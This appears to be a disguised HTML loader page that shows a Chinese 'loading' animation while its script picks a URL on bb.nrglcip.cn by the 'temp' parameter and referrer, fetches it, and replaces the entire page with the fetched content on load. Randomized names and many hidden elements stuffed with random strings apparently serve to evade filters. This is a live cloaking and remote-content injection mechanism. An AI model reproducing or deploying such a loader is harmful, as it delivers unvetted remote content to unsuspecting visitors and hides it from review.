<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Lcw8CTcsXv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Lcw8CTcsXv .xHKVObqi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Lcw8CTcsXv .content {
            line-height: 50px;
            text-align: center
        }

        .Lcw8CTcsXv .img {
            width: 100%
        }

        .Lcw8CTcsXv .nIVPDeFHpwS {
            text-align: center
        }

        .Lcw8CTcsXv .nIVPDeFHpwS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Lcw8CTcsXv .nIVPDeFHpwS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Lcw8CTcsXv .nIVPDeFHpwS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Lcw8CTcsXv .nIVPDeFHpwS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Lcw8CTcsXv .nIVPDeFHpwS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Lcw8CTcsXv .nIVPDeFHpwS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Lcw8CTcsXv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HJHvFwbiz5xa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Zyd3Gt = HJHvFwbiz5xa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Zyd3Gt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Zyd3Gt +".html?a=share";
		}
		
        mruE74mEX=url+"#"+new Date().getTime();
        mruE74mEX && function() {
            $.get(mruE74mEX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>D5mvbaU0mLq04DFOP40I1XLqEzv5qLU9E7p2LEFy5XwlBT1U27Cg2UGbZUErISZ5If9azh7ABCOUA9YFg7</span>
<b style='display:none' >O31hXIGI91YT3SoLn12YA2I</b>
<li style='display:none' >ckbe2xXjEk30NZrBEa7h6uG0q2Xcep5apWVM1m3QpHlyy</li>
<img  src='' style='display:none'>
<p  style='display:none'>uxtTwx6oGXGzpBFmQMQV0u2cwgL7g4XPKOnl6IRbjwRDqAQj7CeE53CqOsb2YOAj7daPkuCTvvJeLol</p>
<h1 style='display:none' >xD3nXQWX8t1pxm2eUf2PhsJMOu3LCo5F2CJeZ85wvZsVIf2lyjaN9v2SYAOeuM5</h1><div class="Lcw8CTcsXv">
    <div class="xHKVObqi">
        <div class="nIVPDeFHpwS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >sxZAB3eXVPxCDvBUqsSvTWaOX7yVLYyFpyqofsodrY4jbvhuMQG0jHlpr</li>
<img  src='' style='display:none'>
<h1 style='display:none' >AsnHfOz2NXEdUyEJkwhGQz8ny</h1>
<span style='display:none'>w5LTBXCbOnVBLMGKW3WGxK8m3J6wmiHUNEUf0kojI0LcyhZjFnOhb5Snsi5Eg0D30cyrJrj7AQbCZnZUHsqmKWG4FzF9Sw</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >dDAUpNDlV64zw5u9TmS55t</ul>
<li style='display:none' >sxZAB3eXVPxCDvBUqsSvTWaOX7yVLYyFpyqofsodrY4jbvhuMQG0jHlpr</li>
<div style='display:none'>sr69sqt8hSUEu4KTudX6a7L5gkpgf4IEgAVdnVZAxICQxyE6nrzmoBONS0yectAd3XTtwkqUoo5q</div>
<h1 style='display:none' >AsnHfOz2NXEdUyEJkwhGQz8ny</h1></body>
</html>